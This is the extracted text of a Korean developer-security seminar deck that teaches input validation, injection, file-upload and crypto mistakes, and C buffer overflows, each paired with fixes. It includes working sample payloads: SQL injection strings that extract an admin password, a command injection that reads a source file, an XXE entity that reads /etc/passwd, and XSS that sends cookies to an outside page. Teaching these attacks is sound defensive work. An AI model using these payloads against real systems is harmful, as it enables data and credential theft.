[D2 campus seminar]개발자가 꼭 알아야 할 보안이야기

1. 개발자가

2. 꼭

3. 알아야

4. 할

5. 보안이야기

6. 저는

7. 한충우

8. UNIST 졸업 2014 HDCON 은상 (CodeC) 2014 DEFCON 본선 (CodeRed) 2013 HolyShield 1위 (CodePink) 2013 화이트햇 콘테스트 3위 (HeXA) E-mail: cwhan.tunz@gmail.com 사진

9. Contents

10. 1  개요 1.1 해커의 목표 1.2 취약점의 발생 원인 2  Web Security 2.1 사용자의 입력 2.2 Injection 2.3 파일 관리 2.4 암호화 3  System Security 3.1 해커가 원하는 상황 3.2 Buffer Overflow 4  보안정책

11. 해커의

12. 목표

13. 부당한

14. 이익

15. 정보

16. 유출

17. 정보

18. 조작

19. 서버

20. 권한

21. 획득

22. 개인

23. 대상

24. 공격

25. 클라이언트

26. 메모리

27. 조작

28. 개인

29. 대상

30. 공격

32. 취약점의

33. 발생

34. 원인

35. 추가적인

36. 보안의

37. 미비

38. 개발자의

39. 실수

40. 오늘은

41. 이거

42. 취약점의

43. 발생

44. 원인

45. 개발자의

46. 실수

47. 개발자의

48. 무신경

49. 나중에

50. 다시

51. 고칠

52. 생각

53. 하지

54. 말고,

55. 지금

56. 당장

57. 생각하자

59. Web

60. Security

61. 사용자의

62. 입력을

63. 절대

64. 믿지

65. 말자

66. 사용자가 조작할 수 있는 입력의 범위? 마우스 클릭 텍스트 입력 버튼 클릭 Browser Server 이

67. 부분

68. 뿐만

69. 아니라

70. 이부분까지도

71. 조작가능

72. JavaScript Cookie HTTP header

73. 사용자의

74. 입력을

75. 절대

76. 믿지

77. 말자

78. POST /foo HTTP/1.1 Host: localhost User-Agent: ~~ Android ~~ Referer: http://naver.com Content-Length: 23 Cookie: userid=tunz; admin=1; param1=val1param2=val2 Virtual Host 조작 Browser/OS 정보 조작 Cookie 조작 이전 페이지 조작 Data 조작

79. 사용자의

80. 입력을

81. 절대

82. 믿지

83. 말자

84. 이런 필터링은 단지 1차적인 필터링일 뿐 서버에 직접 데이터를 보내면 된다. POST /foo HTTP/1.1 Host: example.com User-Agent: Mozilla/~~ Content-Length: 23 Cookie: userid=tunz; admin=1; user=tunz!!!pw=123 Server HTTP Data

85. 사용자의

86. 입력을

87. 절대

88. 믿지

89. 말자

90. §  화면에 버튼이 보이지 않는다고, 그 버튼을 못 누르는 것은 아니다. /?page=1 /?page=2 /?page=3 /?page=4 /?page=5 그럼..

91. /?page=6 도

92. 있나?

93. Try

94. 페이지마다

95. 권한

96. 확인을

97. 꼭

98. 확인할

99. 것!

101. 사용자의

102. 입력을

103. 절대

104. 믿지

105. 말자

106. –

107. Permission

108. Check

109. $ 7,500 (약 800만원)

110. 사용자의

111. 입력을

112. 절대

113. 믿지

114. 말자

115. §  중요한 정보는 사용자가 조작할수 없는곳에 저장하고, 가져오자. §  Client-Side 에서 Filtering 한 정보는, Server-Side 에서 다시 확인하자. §  중요한 페이지명은, 이름을 유추하기 힘들게 변경한다. if ($_COOKIE[‘admin’] == 1) if ($_SESSION[‘admin’] == 1) if (!userid.match(/^[0-9a-zA-Z]+$/)) { alert(‘ID is not alphanumeric’); return false; } if (!preg_match(“/^[0-9a-zA-Z]+$/”, $userid)) { echo ‘ID is not alphanumeric’; exit(); }

116. 사용자의

117. 입력을

118. 절대

119. 믿지

120. 말자

121. -

122. injection

123. 사용자의 입력으로 새로운 데이터를 만들 경우. §  SQL injection §  Command injection §  XXE (XML External Entity) §  XSS (Cross Site Scripting) select * from users where user=‘$id’ and pw=‘$pw’; system(“echo ‘Hello, $name!‘”); body Hello, ?php=$name?! /body argsarg1input/arg1/args

124. 사용자의

125. 입력을

126. 절대

127. 믿지

128. 말자

129. -

130. SQL

131. injection

132. 사용자의 입력으로 새로운 데이터를 만들 경우. §  SQL injection select * from users where user=‘admin’ and pw=‘’ or ‘a’=‘a’; truefalse or true select * from board where bid=‘’ union select idx, uid, uname, pw from   admin –- ’; 응용버전

133. select * from board where bid=‘tunz’ and substr((select pw from users   where user=‘admin’),1,1)=‘a’ –- ’; select * from board where bid=‘tunz’ and if(substr((select pw from   users where user=‘admin’),1,1)=‘a’, sleep(1), 0) –- ’; Union SQL Injection

134. Blind SQL Injection

135. Time Based SQL Injection

137. 사용자의

138. 입력을

139. 절대

140. 믿지

141. 말자

142. -

143. injection

144. 사용자의 입력으로 새로운 데이터를 만들 경우. §  SQL injection select * from users where user=‘tunz’ and pw=‘’ or ‘a’=‘a’; truefalse or true select * from users where user=‘’ union select idx, uid, uname, pw from   admin -- ’ and pw=‘’; 응용버전

145. select * from users where user=‘tunz’ and substr((select pw from users   where user=‘admin’),1,1)=‘a’ -- ’ and pw=‘’; select * from users where user=‘tunz’ and if(substr((select pw from   users where user=‘admin’),1,1)=‘a’, sleep(1), 0) -- ’ and pw=‘’; Union SQL Injection

146. Blind SQL Injection

147. Time Based SQL Injection

149. 사용자의

150. 입력을

151. 절대

152. 믿지

153. 말자

154. -

155. Command

156. injection

157. 사용자의 입력으로 새로운 데이터를 만들 경우. §  SQL injection §  Command injection §  XXE (XML External Entity) §  XSS (Cross Site Scripting) system(“echo ‘Hello, $name!‘”); body Hello, ?php=$name?! /body argsarg1input/arg1/args select * from users where user=‘tunz’ and pw=‘’ or ‘a’=‘a’;

158. 사용자의

159. 입력을

160. 절대

161. 믿지

162. 말자

163. -

164. Command

165. injection

166. 사용자의 입력으로 새로운 데이터를 만들 경우. §  SQL injection §  Command injection §  XXE (XML External Entity) §  XSS (Cross Site Scripting) select * from users where user=‘tunz’ and pw=‘’ or ‘a’=‘a’; system(“echo ‘Hello, ‘; cat index.php; ‘!‘”); body Hello, ?php=$name?! /body argsarg1input/arg1/args

167. body Hello, ?php=$name?! /body argsarg1input/arg1/args 사용자의

168. 입력을

169. 절대

170. 믿지

171. 말자

172. -

173. Command

174. injection

175. 사용자의 입력으로 새로운 데이터를 만들 경우. §  SQL injection §  Command injection §  XXE (XML External Entity) §  XSS (Cross Site Scripting) select * from users where user=‘tunz’ and pw=‘’ or ‘a’=‘a’; system(“echo ‘Hello, ‘; cat index.php; ‘!‘”);

176. 사용자의

177. 입력을

178. 절대

179. 믿지

180. 말자

181. -

182. XXE

183. 사용자의 입력으로 새로운 데이터를 만들 경우. §  SQL injection §  Command injection §  XXE (XML External Entity) §  XSS (Cross Site Scripting) select * from users where user=‘tunz’ and pw=‘’ or ‘a’=‘a’; system(“echo ‘Hello, ‘; cat index.php; ‘!‘”); !DOCTYPE foo [ !ENTITY xxe SYSTEM file:///etc/passwd ] argsarg1xxe;/arg1/args body Hello, ?php=$name?! /body

184. !DOCTYPE foo [ !ENTITY xxe SYSTEM file:///etc/passwd ] argsarg1xxe;/arg1/args body Hello, ?php=$name?! /body 사용자의

185. 입력을

186. 절대

187. 믿지

188. 말자

189. -

190. XXE

191. 사용자의 입력으로 새로운 데이터를 만들 경우. §  SQL injection §  Command injection §  XXE (XML External Entity) §  XSS (Cross Site Scripting) select * from users where user=‘tunz’ and pw=‘’ or ‘a’=‘a’; system(“echo ‘Hello, ‘; cat index.php; ‘!‘”);

192. 사용자의

193. 입력을

194. 절대

195. 믿지

196. 말자

197. -

198. XSS

199. 사용자의 입력으로 새로운 데이터를 만들 경우. §  XSS (Cross Site Scripting) body Hello, scriptlocation.href=“http://malware/”;/script! /body 응용버전

200. script var username=““; alert(document.domain); // ”; /script img src=“x”   onerror=“location.href=‘http://mypage/?’+escape(document.cookie)” / body Hello, a href=“javascript:alert(document.domain)”Click Here/a! /body

201. 사용자의

202. 입력을

203. 절대

204. 믿지

205. 말자

206. -

207. XSS

208. 사용자의 입력으로 새로운 데이터를 만들 경우. §  XSS (Cross Site Scripting) body Hello, scriptlocation.href=“http://malware/”;/script! /body 응용버전

209. script var username=““; alert(document.domain); // ”; /script img src=“x” onerror=“alert(document.domain)” / body Hello, img src=“javascript:alert(document.domain)” /! /body

210. 사용자의

211. 입력을

212. 절대

213. 믿지

214. 말자

215. -

216. injection

217. 각각에 맞는 특수문자 및 키워드들을 필터링 하자. §  SQL injection §  Command injection §  XXE (XML External Entity) §  XSS (Cross Site Scripting) SQL

218. 문을

219. 위한

220. escape

221. 사용,

222. preparedStatement

223. 사용

224. 애초에

225. 커맨드에

226. 입력을

227. 안

228. 넣는

229. 것이

230. 좋긴

231. 하나..

232. 굳이

233. 써야

234. 한다면,

235. 필터링

236. 또는

237. 인코딩

238. 후

239. 사용을

240. 추천합니다.

241. 인코딩

242. (e.g.

244. :

245. lt;

246. ,

248. :

249. gt;

250. ,

251. ‘

252. :

253. #039;

254. ,

255. “

256. :

257. quot;

259. )

260. 필터링이

261. 까다로운

262. 편이기

263. 때문에,

264. 남들이

265. 만들어

266. 놓은걸

267. 사용하시길

268. 추천합니다.

269. Content

270. Security

271. Policy

272. header

273. 사용

274. DTDs

275. 를

276. 사용하지

277. 않도록

278. 설정합니다.

280. File

281. Download

282. 개발할 때 가장 신경 써야 할 부분 사용자는 항상 유도한대로만 행동하지 않는다.

283. File

284. Download

285. 어떤 파일이든 다운로드 가능 소스코드 유출 후, 2차 피해 가능성

286. File

287. Download

288. -

289. solution

290. 2. Hardcoded White Listing 1. Special Characters Filtering 3. DB based White Listing if (stristr($input, “..”) !== False || stristr($input, “/”) !== False) { echo “Error!”; exit(); } if (in_array($_GET[‘fname’], array(“manual1.pdf”, “manual2.pdf”))) downloadFile($_GET[‘fname’]); $result = mysql_query(“select fname from files where num=‘$num’”, $conn); $file = mysql_fetch_assoc($result); fileDownload($file[‘fname’]);

291. File

292. Upload

293. Uploads 폴더에 올려놓고, URL 직접 접근으로 다운받게 하려는 옛날 방법 하지만, 실행 가능한 파일을 업로드 한다면? $target_file = “uploads/” . basename($_FILES[‘fileToUpload’][‘name’]); if (move_uploaded_file($_FILES[‘fileToUpload’][‘tmp_name’], $target_file)) echo “The file “ . basename($_FILES[‘fileToUpload’][‘name’] . “ has been uploaded.”;

294. File

295. Upload

296. 하지만, 실행 가능한 파일을 업로드 한다면? Game

297. Over

298. 소스코드

299. 유출,

300. DB

301. 유출,

302. 페이지에

303. 악성코드

304. 심기,

305. 내부망

306. 공격,

307. 백도어

308. 설치

309. 등...

311. File

312. Upload-

313. solution

314. extension in (“.jpg”, “.png”, “.bmp”, …) ? evil.asp;.jpg 20150227_a24f60df6c.jpg 이미지 보여주기 용도라면, White Listing + 파일명변경을 한다.

315. File

316. Upload-

317. solution

318. §  저장되는 경로를 모르게 한다. §  저장되는 파일명을 변경한다. §  공격이 성공할 것을 대비해, 각 폴더 및 파일에 권한설정을 한다. uploads/abc.jpg 3a0480ed9a/abc.jpg evil.php 20150227_4034a346cc $ chown tunz index.php $ chgrp www-data index.php $ chmod 650 index.php $ ls –al index.php -rw-r-x--- 1 tunz www-data 0 2 22 21:10 index.php

319. File

320. Vulnerability-

321. case

322. study

323. (facebook)

324. Web

325. Shell?

327. php는

328. 업로드

329. 가능하지만,

330. 업로드

331. 된

332. 파일

333. 경로를

334. 몰라서

335. 실행

336. 불가능.

337. Process

338. Read

339. To

340. Client

341. 확장자

342. 체크

343. X

344. Exploit:

345. Unzip

346. and

347. Read

348. To

349. Client

350. zip

351. of

352. Symlink

353. of

354. /etc/passwd

355. (바로가기)

356. /etc/passwd

357. Vuln!

359. File

360. Upload-

361. case

362. study

363. (facebook)

364. 암호화

365. 정보가 유출되었다 하더라도, 의미를 알아내기 어렵게 하기 위함 관리자가 몰라도 되는 정보 그 외 민감한 정보 민감하지 않으나, 기존 데이터와 충돌 가능성 Hash

366. Crypto

367. Encoding

368. 암호화

369. –

370. 잘못된

371. 예

372. (암호와

373. 인코딩의

374. 구별)

375. Tip

376. : 사용자 패스워드는 salt 붙여서 hash 하는 것이 좋다. [ 사전식 해독의 방지 ] sha1(“Naver”.$password.”D2!”) 패스워드는 소중하니까 암호화 해야지 ㅎㅎ $password = base64_encode($password); base64는 암호가 아니에요.. 암호는 관리자가 몰라도 되는 정보이므로, Hash 를 한다. if (sha1($password) === $db_password) asdf.encode('base64') 'YXNkZg==n' YXNkZg==.decode('base64') 'asdf'

377. 암호화

378. –

379. 잘못된

380. 예

381. (잘못된

382. 키

383. 사용)

384. 패스워드는 소중하니까 암호화 해서 전송해야지 ㅎㅎ script key = “1234567890123456”; password = AES.encrypt(password, key); sendToServer(password); /script 키를 다 보여줘 놓고 암호화 하면 무슨 소용... Tip

385. :

386. 비밀키, (개인키, 공개키)의 기본적인 개념은 알아 둘 것. (e.g. AES, RSA ...) 키가 보여지는 상황이라면, 공개키를 사용하자 script pubkey = “~~~~~~~~~~~~~~~~~”; password = RSA.encrypt(password, pubkey, e); sendToServer(password); /script

387. 암호화

388. –

389. 잘못된

390. 예

391. (잘못된

392. 커스터마이징)

393. 패스워드는 소중하니까 강력하게 한 글자씩 암호화 해야지 ㅎㅎ $encrypted = “”; for ($i = 0; $i strlen($password); $i++) $encrypted .= sha1($password[$i]); 글자가 길어질 뿐.. 경우의수가 256개밖에 안되기 때문에, 금방 뚫린다. a 86f7e437faa5a7fce15d1ddcb9eaeaea377667b8  b e9d71f5ee7c92d6dc9e92ffdad17b8bd49418f98 C 84a516841ba77a5b4648de2cd0dfcb30ea46dbb4 …

394. Software

395. (System)

396. Security

397. 시스템

398. 해킹?

399. 시스템해킹엔

400. 여러

401. 의미가

402. 있으나..

403. 오늘은

404. 주로

405. C/C++에

406. 관하여

407. 조금만

409. 해커가

410. 원하는

411. 상황

412. 이런 에러가 나는 이유? 의도치 않은 영역의 메모리를 읽거나 쓰려고 해서. 의도치 않은 영역을 내 마음대로 조작할 수 있다면?

413. 해커가

414. 원하는

415. 상황

416. 원하는 영역의 메모리를 읽으면, 정보 유출. 원하는 영역의 메모리를 쓰면, 정보 조작. 프로그램이 실행할 코드를 조작 (정확히는 Program Counter) 해커의 명령어 수행

417. 해커가

418. 원하는

419. 상황

420. 그

421. 상황이

422. 일어나지

423. 않기

424. 막기

425. 위해서는

426. 버그

427. 없는

428. 코딩

429. Length

430. Check

431. Variable

432. Type

433. Overflow

434. Check

435. Dangling

436. Pointer

437. Race

438. Condition

439. 등

440. 등

441. 등

442. 등

444. Buffer

445. Overflow

446. –

447. example

448. (stack

449. overflow)

450. char buf[1024]; int size; read(fd, size, sizeof(int)); read(fd, buf, size - sizeof(int)); 아까

451. 말했듯이,

452. 사용자

453. 입력은

454. 믿을

455. 수

456. 없다.

457. 만약,

458. size가

459. 버퍼의

460. 크기보다

461. 크다면?

463. Buffer

464. Overflow

465. –

466. example

467. (stack

468. overflow)

470. 말했듯이,

471. 사용자

472. 입력은

473. 믿을

474. 수

475. 없다.

476. 만약,

477. size가

478. 버퍼의

479. 크기보다

480. 크다면?

481. Memory

482. buf

483. Buffer

484. Overflow

485. –

486. example

487. (stack

488. overflow)

490. 말했듯이,

491. 사용자

492. 입력은

493. 믿을

494. 수

495. 없다.

496. 만약,

497. size가

498. 버퍼의

499. 크기보다

500. 크다면?

501. Memory

502. input

503. Buffer

504. Overflow

505. –

506. example

507. (stack

508. overflow)

510. 말했듯이,

511. 사용자

512. 입력은

513. 믿을

514. 수

515. 없다.

516. 만약,

517. size가

518. 버퍼의

519. 크기보다

520. 크다면?

521. Memory

522. input ret addr ? func ptr? Flow

523. Control

524. 이

525. 가능해질

526. 수

527. 있다.

529. Buffer

530. Overflow

531. –

532. example

533. (stack

534. overflow)

535. char buf[1024]; int size; read(fd, size, sizeof(int)); if (size 1000) read(fd, buf, size - sizeof(int)); 그럼, 한번 고쳐보자. 이제, 괜찮은가?

536. Buffer

537. Overflow

538. –

539. example

540. (stack

541. overflow)

542. char buf[1024]; int size; read(fd, size, sizeof(int)); if (size 1000) read(fd, buf, size - sizeof(int)); -1을 size에 넣어보자.

543. Buffer

544. Overflow

545. –

546. example

547. (stack

548. overflow)

549. char buf[1024]; int size; read(fd, size, sizeof(int)); if (size 1000) read(fd, buf, size - sizeof(int)); -1을 size에 넣어보자. True read(fd, buf, 4294967291) typedef unsigned long size_t; Why? ssize_t read(int fd, void *buf, size_t count); unsinged 형으로 자동변환 된다.

550. Buffer

551. Overflow

552. –

553. example

554. (stack

555. overflow)

556. 다시 고쳐보자 정확히 size의 길이를 제한했다. 이제 문제 없나? char *buf[1024]; int size; read(fd, size, sizeof(int)); if (size – sizeof(int) = 0 || size 1024) my_error(“ERROR! EXIT”); read(fd, buf[i], size - sizeof(int));

557. Buffer

558. Overflow

559. –

560. example

561. (stack

562. overflow)

563. size 에 0을 넣으면? char *buf[1024]; int size; read(fd, size, sizeof(int)); if (0 – sizeof(int) = 0 || 0 1024) my_error(“ERROR! EXIT”); read(fd, buf[i], size - sizeof(int));

564. Buffer

565. Overflow

566. –

567. example

568. (stack

569. overflow)

570. size 에 0을 넣으면? sizeof(int) 의 리턴 타입이 unsigned 형이기 때문. char *buf[1024]; int size; read(fd, size, sizeof(int)); if ((unsigned int)-4 = 0 || 0 1024) my_error(“ERROR! EXIT”); read(fd, buf[i], size - sizeof(int)); 여전히, Buffer Overflow! False

571. Buffer

572. Overflow

573. –

574. example

575. (stack

576. overflow)

577. char buf[1024]; unsigned int size; read(fd, size, sizeof(unsigned int)); if (size 1024) read(fd, buf, size - sizeof(unsigned int)); 제대로 고쳐보자 대충 이런 식으로 char buf[1024]; unsigned int size; read(fd, size, sizeof(unsigned int)); if (size - sizeof(int) 1024) my_error(“Error!”); read(fd, buf, size - sizeof(unsigned int));

578. Buffer

579. Overflow

580. –

581. example

582. (heap

583. overflow)

584. int *buf; unsigned int size; read(fd, size, sizeof(unsigned int)); buf = (int *)malloc(size * sizeof(int)); for (i=0; i size; i++) read(fd, buf[i], sizeof(int)); 다른 문제 Size 만큼 메모리 할당을 해주는데 뭐가 문제지?

585. Buffer

586. Overflow

587. –

588. example

589. (heap

590. overflow)

591. int *buf; unsigned int size; read(fd, size, sizeof(unsigned int)); buf = (int *)malloc(size * sizeof(int)); for (i=0; i size; i++) read(fd, buf[i], sizeof(int)); 0x40000004 를 입력으로 넣으면. 메모리 할당은 16바이트만 되었는데, read 는 여전히 0x40000004 만큼 읽는다. malloc(16) Overflow! Buffer Overflow! size 에 따라 메모리할당이 되더라도, size 에는 제한을 두자. 0x40000004 * 4 = 0x100000010.

592. 끝으로

593. Mistake Crash Modify Code Pointer Find gadgets ROP Execute injected Shellcode Control-flow hijacking

594. 끝으로

595. 사람은 실수를 하기 마련이고, 서비스가 커지면 커질수록 취약점은 반드시 나온다. 그렇다면 공격을 막기 위해서는? 서버 공격 시도만 해도 차단, 고소. + 공격 성공 전 미리 차단 가능. + 국내 해커의 소극적 공격. - 취약점들의 존재 가능성은 여전. - 취약점을 내부에서 모두 찾아야 한다. 취약점 제보 시 보상과 명예를 드높여준다. + 수많은 취약점 발견 및 수정 가능. - 오히려 공격을 유도 할 수 있다. - 악의적인 공격의 구분 힘들다. 적절히 잘 섞어 보세요... 강하게 너그럽게

596. 감사합니다

[D2 campus seminar]개발자가 꼭 알아야 할 보안이야기

Empfohlen

Empfohlen

Weitere ähnliche Inhalte

Ähnlich wie [D2 campus seminar]개발자가 꼭 알아야 할 보안이야기

Ähnlich wie [D2 campus seminar]개발자가 꼭 알아야 할 보안이야기 (20)

Mehr von NAVER D2

Mehr von NAVER D2 (20)

[D2 campus seminar]개발자가 꼭 알아야 할 보안이야기